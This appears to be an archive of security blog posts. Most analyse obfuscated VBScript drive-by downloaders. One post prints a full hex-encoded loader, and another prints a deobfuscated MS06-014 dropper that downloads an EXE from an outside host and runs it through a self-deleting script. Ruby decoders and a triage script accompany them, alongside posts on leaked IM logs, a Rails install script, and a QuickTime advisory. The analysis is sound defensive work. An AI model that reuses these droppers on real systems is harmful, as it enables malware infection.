web exploits using more sophisticated ciphers

found this one today:

S="6f6e206572726f7220726573756D65206E6578740d0a6375726C3D22687474703A2F2f78787476622e636E2F6172702f676F"
S=S+"2e657865220D0A666e616D65313D22676F2e657865220D0a666E616d65323D22676F2e766273220D0A536574206466203D20"
S=S+"646f63756D656e742E637265617465456C656d656e7428226f626A65637422290D0a64662E73657441747472696275746520"
S=S+"22636c6173736964222C2022636C7369643A42443936433535362D363541332d313144302D393833412d3030433034464332"
S=S+"39453336220d0a7374723d224d6963726F736F66742E584d4C48545450220D0a5365742078203D2064662e4372656174654F"
S=S+"626A656374287374722c2222290D0a43313d2241646f220d0a43323D2264622e220D0a43333d22737472220d0a43343D2265"
S=S+"616d220D0a737472313d43312643322643332643340d0a737472353D737472310D0a7365742053203d2064662e6372656174"
S=S+"656f626a65637428737472352c2222290d0a532e74797065203d20310D0A737472363D22474554220d0A782e4f70656e2073"
S=S+"7472362c206375726c2c2046616c73650D0a782E53656E640d0a73313D22536372697074220D0a73323D22696e672e220d0A"
S=S+"73333d2246696c65220d0a73343D2253797374656D4f626a656374220d0a73303D73312b73322b73332b73340d0a73657420"
S=S+"46203D2064662e6372656174656F626a6563742873302c2222290D0a73657420746D70203D20462e4765745370656369616C"
S=S+"466f6C6465722832290d0A666e616d65313d20462E4275696c645061746828746D702C666e616d6531290d0A532e6f70656e"
S=S+"0d0a532e777269746520782E726573706F6E7365426f64790D0a532e73617665746F66696c6520666E616d65312c320D0a53"
S=S+"2E636C6f73650d0a666E616D65323D20462E4275696C645061746828746d702c666E616d6532290d0a536574207473203d20"
S=S+"462e4f70656e5465787446696c6528666e616d65322C20322c2054727565290D0a74732e57726974654c696E652022536574"
S=S+"205368656c6c203d204372656174654F626a656374282222577363726970742e5368656c6C222229220d0A73716c3D225368"
S=S+"656c6c2E52756e282222222B666e616d65312b22222229220d0A74732e57726974654C696e652073716C0D0a74732e577269"
S=S+"74654c696E652022736574205368656C6c3D4E6F7468696E67220d0A74732e636C6F73650D0A696620462E46696c65457869"
S=S+"73747328666E616D6531293D74727565207468656e0D0a696620462e46696c6545786973747328666E616d6532293d747275"
S=S+"65207468656e0d0A202020207368613D225368656c6c2e417070220d0a202020207368623d7368610d0a2020202073657420"
S=S+"51203D2064662e6372656174656f626a656374287368622B226C69636174696f6E222C2222290D0A20202020512e5368656C"
S=S+"6C4578656375746520666e616d65322C22222c22222c226f70656E222C300D0a656e642069660D0a656E642069660D0A"
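The "cipher" here is nothing more than the payload written out as two hex digits per byte, in mixed case, and fed to the page as a series of VBScript string concatenations. Below is an added Ruby example (not part of the original post) that takes the `S="…"` / `S=S+"…"` lines, pulls the quoted chunks out in order, hex-decodes them strictly, and then lists any URLs in the recovered VBScript; run over the lines above it recovers plain VBScript (On Error Resume Next, a URL to an .exe, a classid CLSID, and an XMLHTTP/ADODB.Stream download-and-run routine). The sample loader embedded in the block is constructed for this example and decodes to a harmless three-line snippet.

```ruby
# Decoder for the hex-blob loader shown above: the served page is VBScript that
# builds S from concatenated string literals, each holding the real payload as
# two hex digits per byte (upper and lower case mixed). Added example, not from
# the original post. SAMPLE_LOADER is constructed; it decodes to three harmless lines.
SAMPLE_LOADER = <<~VBS
  S="4F6e204572726F7220526573756d65204E6578740D0a"
  S=S+"6375726C3D22687474703A2F2F6578616d706c652E696E76616C69642F612E657865220D0A"
  S=S+"666e616d65313D22676F2e657865220D0a"
VBS

# Collect the quoted chunks in source order; the S=S+ lines are pure concatenation.
def extract_hex(loader_source)
  loader_source.scan(/"([0-9A-Fa-f]*)"/).flatten.join
end

# Strict hex decode: refuse odd lengths or stray characters instead of quietly
# producing garbage, because the next step is reading the result as code.
def hex_to_text(hex)
  raise ArgumentError, "odd-length hex string" if hex.length.odd?
  raise ArgumentError, "non-hex characters present" unless hex.match?(/\A[0-9A-Fa-f]*\z/)
  [hex].pack("H*")   # pack "H*" accepts both cases of hex digit
end

def decode_loader(loader_source)
  hex_to_text(extract_hex(loader_source))
end

# For a downloader the first IOC you want is where it fetches from.
def extract_urls(vbs)
  vbs.scan(%r{https?://[^\s"'<>]+})
end

if __FILE__ == $0
  decoded = decode_loader(ARGV.empty? ? SAMPLE_LOADER : File.read(ARGV[0]))
  puts decoded
  puts "URLs: #{extract_urls(decoded).inspect}"
end
```

Save the `S=` lines from the page into a file and pass it as the first argument; with no argument the constructed sample is decoded instead. The decode is kept strict on purpose: a dropped or doubled character in a copy-pasted blob shifts every following byte, and an error is more useful than a half-decoded script.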

Sending your IM logs to Tech Support

I ran into an awkward situation the other day while debugging an issue with my PDA synch software. I’m in a unique situation where I have an older Windows Mobile based PDA but I’m using a Powerbook for my main computing needs. The two don’t play so nicely together; however, certain software vendors like MarkSpace pick up the slack with middleware. “The Missing Sync” allows me to bridge this gap and synch the MS hardware with OS X software. I ran into an issue when I inadvertently upgraded to a non-free version (they moved on to 3.0, but I’m content with the 2.5 I paid for last year), and while it was giving me errors I decided to try to open an automated tech support ticket. The dialog box that came up notified me that system information was being sent, and there was a button to review what would be transmitted. Training with the Stopbadware group made me curious, and I pressed the button.

What I saw was unsettling, and I’m still trying to determine who is “at fault”. Amid the lines of system diagnostic info were my IM conversations for the last few days. Nothing incredibly personal, but nothing that I really wanted the Tech Support Rep at Markspace to read. Definitely nothing that would help them solve any of my PDA synch issues. I realized that the tech support application simply pulled the entire console.log file from my computer, which Growl (an increasingly popular notification app) had been logging my IM conversations to. By default Growl logs every IM, sign-on, etc. that it displays to console.log.

[screenshot: Growl preferences panel]
Note that in this picture I have changed the default away from console.log.

I’m really not sure who should change here. Should Growl stop logging to console.log by default? Should MarkSpace stop pulling the entire console.log file? Who else is doing this as part of their tech support procedures? At the very least users of Growl should change this setting until the dust settles. I’m still in communication with MarkSpace and can say that they are responsive and now very aware of this issue.

Beansec turns 1!

This Wednesday will mark the 12th ever beansec! If you haven’t been to one yet or haven’t found time to attend then this is the month to make it.

BeanSec! is an informal meetup of information security professionals, researchers and academics in the Greater Boston area that meets the third Wednesday of each month.

Come get your grub on. Lots of good people show up. Really.

Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

the Enormous Room in Cambridge:
567 Mass Ave, Cambridge 02139

Rails install script for Ubuntu (feisty fawn)

echo "Credit to Urban Puddle for the guide"
echo "this is the article in script form"
echo "you can cut and paste this entire article into a shell script and run it."

sudo apt-get update
sudo apt-get dist-upgrade

sudo apt-get install build-essential

sudo apt-get install ruby ri rdoc mysql-server libmysql-ruby ruby1.8-dev irb1.8 libdbd-mysql-perl libdbi-perl libmysql-ruby1.8 libmysqlclient15off libnet-daemon-perl libplrpc-perl libreadline-ruby1.8 libruby1.8 mysql-client-5.0 mysql-common mysql-server-5.0 rdoc1.8 ri1.8 ruby1.8

# This download is plain HTTP with no checksum or signature check; compare the
# tarball against the checksum published by the project before running setup.rb.
sudo wget http://rubyforge.org/frs/download.php/20...
tar -xzvf rubygems-0.9.4.tgz
cd rubygems-0.9.4
sudo ruby setup.rb

sudo gem install rails --include-dependencies

sudo apt-get install libpcre3 nginx libfcgi-dev libfcgi-ruby1.8 libfcgi0c2

sudo apt-get install libxml2 ucf php5-common php5-cgi php5-mysql phpmyadmin

sudo gem install mongrel
sudo gem install mongrel_cluster

echo "sudo cp /usr/lib/ruby/gems/1.8/gems/mongrel_cluster-0.2.1/resources/mongrel_cluster "
echo "/etc/init.d/mongrel_cluster"

echo "Next, add a path statement to mongrel_cluster file just above the CONF_DIR variable:"
echo "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local:/usr/local/sbin:/usr/local/bin"
echo "Thanks to Russ Brooks for the above tip"

echo "Finally, let's modify permissions and make sure we boot mongrel on startup:"

echo "sudo chmod +x /etc/init.d/mongrel_cluster"
echo "sudo update-rc.d mongrel_cluster defaults"

echo "9. Congratulations, you've got everything installed! It's time to deploy. If you have an "
echo "existing rails application on another server, let's move it over to our root at /var/www/"
echo "sudo mv myrailsapp /var/www/"

echo "10. Modify your permissions of your app and phpmyadmin:"
echo "sudo chown -R www-data:www-data myrailsapp"
echo "sudo chown -R www-data:www-data phpmyadmin"

echo "11. Setup the Mongrel Cluster (source). This will get us a group of 3 mongrel processes "
echo "starting at port 8000. From within your myrailsapp/config folder, type:"
echo "sudo mongrel_rails cluster::configure -e production -p 8000 -N 3 -c /var/www/myrailsapp -a 127.0.0.1 --user mongrel --group mongrel"

echo "Now let's create a symlink to that file from within /etc where all our configs live:"
echo "sudo mkdir /etc/mongrel_cluster"
echo "cd /etc/mongrel_cluster/"
echo "sudo ln -s /var/www/myrailsapp/config/mongrel_cluster.yml"

echo "You can download a sample mongrel_cluster file HERE. In any case, it's a good idea to "
echo "download it and cross reference it to what the above command produced."

echo "12. Next we're going to put a script into /var/www/phpmyadmin folder "
echo "to spawn fastcgi on "
echo "port 8888. Make sure you give it execute permissions using"
echo " sudo chmod +x fastcgi_script"

echo "Download the script here. Inspiration for this script came from Alexey N. Kovyrin. It has "
echo "been modified only for Ubuntu's PHP path. Don't forget to put it into "
echo "/var/www/phpmyadmin"

echo "13. We're *almost* done. Next step is to configure Nginx. Here's a sample nginx.conf file"
echo "for your /etc/nginx/ folder. It's set up to handle one rails app and phpmyadmin. Adding "
echo "additional servers just means more server blocks."

echo "14. Now that we've got everything set up, let's turn this sucker on!"
echo "Step 1: PHP: . /var/www/phpmyadmin/fastcgi_script"
echo "Step 2: Mongrel: /etc/init.d/mongrel_cluster start"
echo "Step 3: Nginx: /etc/init.d/nginx start"

echo "References:"

echo " * There's lots of great documentation for Mongrel here."
echo " * There's an entire wiki devoted to Nginx in English"
echo " * Ezra Zygmuntowicz is the man!"
echo " * Russ Brooks has a great HowTo as well"

Simple Shell Script for Testing Badware

day:~ zero$ cat fake_ie.sh
#!/bin/sh
# Fetch a page the way a badware site expects to see it: with an IE 6 User-Agent.
curl -A "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "$1" | less
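The same idea as fake_ie.sh in Ruby, with a first-pass triage of the response added. This is an added example, not the original post's script; the marker list is drawn from the obfuscation styles discussed elsewhere on this page (the Script Encoder `#@~^` header, the `S=S+"…"` hex loader, `execute(rechange(…))`, the RDS.DataSpace CLSID, ADODB.Stream, and zero-size iframes), and the sample HTML in the checks is constructed. Only `fetch_as_ie` touches the network, and it deliberately does not follow redirects, since the redirect chain is usually part of what you want to look at.

```ruby
require "net/http"
require "uri"

# Added example: the curl one-liner above as Ruby, plus a first-pass triage of
# the body. Offline-safe except for fetch_as_ie, which is the only network call.
FAKE_IE_UA = "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

# Build the request without sending it, so headers can be inspected and tested.
def build_fake_ie_request(url, referer: nil)
  uri = URI.parse(url)
  req = Net::HTTP::Get.new(uri)
  req["User-Agent"] = FAKE_IE_UA
  req["Accept"] = "text/html,*/*"
  req["Referer"] = referer if referer   # many landing pages only fire when arriving from a search engine
  req
end

# One request, no redirect following: a 302 to a second host is itself evidence.
def fetch_as_ie(url, referer: nil)
  uri = URI.parse(url)
  req = build_fake_ie_request(url, referer: referer)
  Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == "https",
                  open_timeout: 10, read_timeout: 10) do |http|
    res = http.request(req)
    { code: res.code, location: res["Location"], body: res.body.to_s }
  end
end

# Obfuscation and delivery markers seen in the posts on this page.
MARKERS = {
  script_encoder: /\#@~\^/,                               # Windows Script Encoder header
  hex_loader:     /S=S\+"[0-9A-Fa-f]{40,}"/,              # S=S+"6f6e2065..." hex chunks
  charcode_exec:  /execute\s*\(\s*rechange\s*\(/i,        # Chr()-rebuilt code handed to execute
  rds_dataspace:  /BD96C556-65A3-11D0-983A-00C04FC29E36/i,
  adodb_stream:   /adodb\.stream/i,
  hidden_iframe:  /<iframe[^>]*\b(?:width|height)\s*=\s*["']?0\b/i,
}.freeze

def suspicious_markers(html)
  MARKERS.select { |_, re| html.match?(re) }.keys
end

if __FILE__ == $0 && !ARGV.empty?
  res = fetch_as_ie(ARGV[0], referer: ARGV[1])
  puts "HTTP #{res[:code]} #{res[:location]}"
  puts "markers: #{suspicious_markers(res[:body]).inspect}"
end
```

Usage: `ruby fetch_as_ie.rb http://suspect.example/ http://www.google.com/`. The body is never rendered or executed, only matched; anything flagged goes to the decoders from the other posts on this page.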

New Critical Quicktime Vulnerabilities Out

Just received word that new vulnerabilities exist for QuickTime which can lead to infection by simply browsing a website. Don’t let the “enticing a user” language in the advisory fool you. With the huge number of website break-ins and subsequent iframe injections, the chance of a legitimate site infecting you is significant. An attacker simply doesn’t need to “entice a user” anymore.

Below is the actual text from the Apple advisory:

QuickTime 7.2

CVE-ID: CVE-2007-2295

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted H.264 movie may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue exists in QuickTime’s handling of H.264 movies. By enticing a user to access a maliciously crafted H.264 movie, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of QuickTime H.264 movies. Credit to Tom Ferris of Security-Protocols.com, and Matt Slot of Ambrosia Software, Inc. for reporting this issue.

CVE-ID: CVE-2007-2392

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue exists in QuickTime’s handling of movie files. By enticing a user to access a maliciously crafted movie file, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of movie files. Credit to Jonathan ‘Wolf’ Rentzsch of Red Shed Software for reporting this issue.

CVE-ID: CVE-2007-2296

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted .m4v file may lead to an unexpected application termination or arbitrary code execution

Description: An integer overflow vulnerability exists in QuickTime’s handling of .m4v files. By enticing a user to access a maliciously crafted .m4v file, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of .m4v files. Credit to Tom Ferris of Security-Protocols.com for reporting this issue.

CVE-ID: CVE-2007-2394

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Viewing a maliciously crafted SMIL file may lead to an unexpected application termination or arbitrary code execution

Description: An integer overflow vulnerability exists in QuickTime’s handling of SMIL files. By enticing a user to access a maliciously crafted SMIL file, an attacker can trigger the issue which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of SMIL files. Credit to David Vaartjes of ITsec Security Services, working with the iDefense VCP, for reporting this issue.

CVE-ID: CVE-2007-2397

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: A design issue exists in QuickTime for Java, which may allow security checks to be disabled. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing a more accurate permissions check. Credit to Adam Gowdiak for reporting this issue.

CVE-ID: CVE-2007-2393

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: A design issue exists in QuickTime for Java. This may allow Java applets to bypass security checks in order to read and write process memory. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of Java applets. Credit to Adam Gowdiak for reporting this issue.

CVE-ID: CVE-2007-2396

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: A design issue exists in QuickTime for Java. JDirect exposes interfaces that may allow loading arbitrary libraries and freeing arbitrary memory. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by removing support for JDirect from QuickTime for Java. Credit to Adam Gowdiak for reporting this issue.

CVE-ID: CVE-2007-2402

Available for: Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista, XP SP2

Impact: Visiting a malicious website may lead to the disclosure of sensitive information

Description: A design issue exists in QuickTime for Java, which may allow a malicious website to capture a client’s screen content. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to the disclosure of sensitive information. This update addresses the issue by performing a more accurate access control check.

MediaDefender caught in entrapment scheme

MediaDefender is a long-time “enforcement” agency of the MPAA. Recently they were caught setting up a fake online video site (think YouTube for pirated movies) and now claim the site was only an internal project and that they were the victims of libel. The site was taken down amid controversial blogging and coverage from geek portal Digg.com. Shortly afterwards the DNS registrations were also wiped clean. Ars Technica reports that the site also offered a software package that was purported to “increase download times” but instead “performed searches of the user’s computer for other illegal software and reported its findings back to MediaDefender.” That kind of behavior definitely falls under spyware, no matter how noble the intentions are supposed to be. Companies like MediaDefender have already skirted the line of what is permissible under law by stalking children and students through networks like BitTorrent, and now seem to be developing technology to search their hard drives without consent. If anyone has a copy of the software I would be extremely interested in taking a look at what it does and reporting on it.

[screenshot: miivi offering commercial movies for download]

[screenshot: miivi DNS registration before MediaDefender altered it]

Targeting IE

An easy way to target Internet Explorer is to use VBScript as the exploit obfuscation mechanism: only IE will run it, and it keeps the payload out of simple signature matching. In this case the layer on top is the Microsoft Script Encoder (screnc.exe, which produces the VBScript.Encode block seen below). It was meant to “protect” source code from prying eyes, but it is a fixed substitution, not encryption, and as substitution ciphers go it doesn’t help much. A decoder written years ago still worked perfectly well for the purposes of this exercise.

<%'**Start Encode**#@~^RhUAAA==@#@[LONG LINES OF CHARS]#@&cSMEAA==^#~@>

The decoded page contained yet another blob to decode, but this time it was simply comma-separated ASCII character codes (the rechange function below turns each one back into a character with Chr and hands the result to execute). Ruby made quick work of this using sprintf:

message = ""
characters = digits.split(",")  # digits: the comma-separated list assigned to T below
characters.each do |character|
  message = message + sprintf("%c", character.to_i)
end
puts message

<script language="VBScript">
<%@ LANGUAGE = VBScript.Encode %>

<%
AK47="http://EVIL.SITE/xy.exe"

Function rechange(kitty)
str=Split(kitty,",")
T=""
For i = 0 To UBound(str)
T=T+Chr(eval(str(i)))
Next
rechange=T
End Function
T="[LONG STRING OF COMMA SEPARATED DIGITS]"
i=T
execute(rechange(I))
%>

The ending here is predictable. The decoded segment below creates an object with the RDS.DataSpace CLSID (BD96C556-65A3-11D0-983A-00C04FC29E36, the MS06-014 hole) and uses its CreateObject method to obtain Microsoft.XMLHTTP, ADODB.Stream, Scripting.FileSystemObject and Shell.Application without any ActiveX prompt: it fetches the executable from AK47, writes it into the temp folder (GetSpecialFolder(2)) with ADODB.Stream, drops a small .vbs beside it that runs the EXE and then deletes itself, and launches that script with Shell.Application’s ShellExecute. The junk '11 comment lines between every statement and the chopped-up string literals have the look of code which was machine generated and not written by hand. That reeks of a toolkit!
There is an interesting forum post with the quote “rav is rubbish” (the same string sits unused at the top of the decoded code) plus several mentions of this code in Chinese forums.


'11
https="rav is rubbish"
'11
On Error Resume Next
'11
jjyy= "ob"&"je"&"ct"
'11
Set PP=document.createElement(jjyy)
'11
PP.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-"&"11D0-98"&"3A-00C04"&"FC2"&"9E36"
'11
Set XXX1=PP.CreateObject("M"&"ic"&"ros"&"oft."&"XML"&"HT"&"TP","")
'11
XXX1.Open "G"&"ET", AK47, False
'11
XXX1.Send
'11
ExeName="co"&"mm"&"om"&"d.pif"
'11
CallVbs="ca"&"ll.vbs"
'11
Set XXX2=PP.createobject("Scri"&"p"&"ti"&"ng.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
'11
Set XXX3=XXX2.GetSpecialFolder(2)
'11
ExeName=XXX2.BuildPath(XXX3,ExeName)
'11
CallVbs=XXX2.BuildPath(XXX3,CallVbs)
'11
AAA="A"&"d"
'11
CCC="o"&"d"&"b"&"."&"s"&"tre"&"am"
'11
DC=AAA&CCC
'11
Set XXX4=PP.createobject(DC,"")
'11
XXX4.type=1
'11
XXX4.Open
'11
XXX4.Write XXX1.ResponseBody
'11
XXX4.Savetofile ExeName,2
'11
XXX4.Close
'11
XXX4.Type=2
'11
XXX4.Open
'11
XXX4.WriteText "On Error Resume Next"&vbCrLf&"Set ws=CreateObject(""Wscript.Shell"")"&vbCrLf&"ws.Run ("""&ExeName&""")"&vbCrLf&"Set fso = CreateObject(""Scripting.FileSystemObject"")"&vbCrLf&"WScript.Sleep 1000"&vbCrLf&"fso.DeleteFile(WScript.ScriptName)"&vbCrLf&"If fso.FileExists("""&CallVbs&""") Then fso.DeleteFile("""&CallVbs&""")"&vbCrLf&"If fso.FileExists("""&html&""") Then fso.DeleteFile("""&html&""")"
'11
XXX4.Savetofile CallVbs,2
'11
XXX4.Close
'11
GBA="Sh"&"e"&"l"&"l"&"."&"Ap"&"p"&"li"
'11
GBP="ca"&"ti"&"on"
'11
Set APIRun=PP.createobject(GBA&GBP,"")
'22
'33
APIRun.ShellExecute CallVbs,"","","Open",0
'44
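The dropper above comes out of two cheap layers: the comma-separated character codes that rechange feeds through Chr(eval(…)) and execute, and then string splitting ("ob"&"je"&"ct", "class"+"id") so that no object name ever appears whole. Here is an added Ruby example (not from the original post) that undoes both without ever evaluating attacker code. Because the original calls eval on each element, an element is not guaranteed to be a bare integer, so the decoder accepts an integer or a single +/- expression and refuses anything else. The sample blob is constructed for this example and decodes to x="object"; the second input is the classid line from the decoded dropper above.

```ruby
# Stage two of the dropper shown above. rechange() in the original does
# T = T + Chr(eval(str(i))) for every comma-separated element, then execute(T).
# Added example, not from the original post: same result, no eval.
def eval_char_code(element)
  case element.strip
  when /\A(\d+)\z/
    $1.to_i
  when /\A(\d+)\s*([+-])\s*(\d+)\z/          # eval() would allow "60+60"; allow only this shape
    $2 == "+" ? $1.to_i + $3.to_i : $1.to_i - $3.to_i
  else
    raise ArgumentError, "refusing to evaluate #{element.inspect}"
  end
end

# Same job as the VBScript rechange(): char codes back to text.
def rechange(blob)
  blob.split(",").map do |element|
    code = eval_char_code(element)
    raise ArgumentError, "char code out of range: #{code}" unless (0..255).cover?(code)
    code.chr
  end.join
end

# Re-join split string literals so "ob"&"je"&"ct" reads as "object" and
# "class"+"id" as "classid". One gsub pass only merges adjacent pairs, so
# repeat until the text stops changing.
def join_split_strings(vbs)
  pattern = /"([^"]*)"\s*[&+]\s*"([^"]*)"/
  loop do
    joined = vbs.gsub(pattern) { "\"#{$1}#{$2}\"" }
    return joined if joined == vbs
    vbs = joined
  end
end

def deobfuscate(blob)
  join_split_strings(rechange(blob))
end

# Constructed sample for this example: the codes spell x="ob"&"je"&"ct", with the
# first element written as an expression, the way eval() in the original permits.
SAMPLE_BLOB = "60+60,61,34,111,98,34,38,34,106,101,34,38,34,99,116,34"

# A line from the decoded dropper above; joining the pieces exposes the CLSID.
CLASSID_LINE = 'PP.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-"&"11D0-98"&"3A-00C04"&"FC2"&"9E36"'

if __FILE__ == $0
  puts deobfuscate(SAMPLE_BLOB)
  puts join_split_strings(CLASSID_LINE)
end
```

Paste the contents of T from the rechange stage into SAMPLE_BLOB's place and the output is the second-stage script in readable form, with the CLSID, the ProgIDs and the dropped file names in one piece, which is what you want to pivot on when searching for other copies.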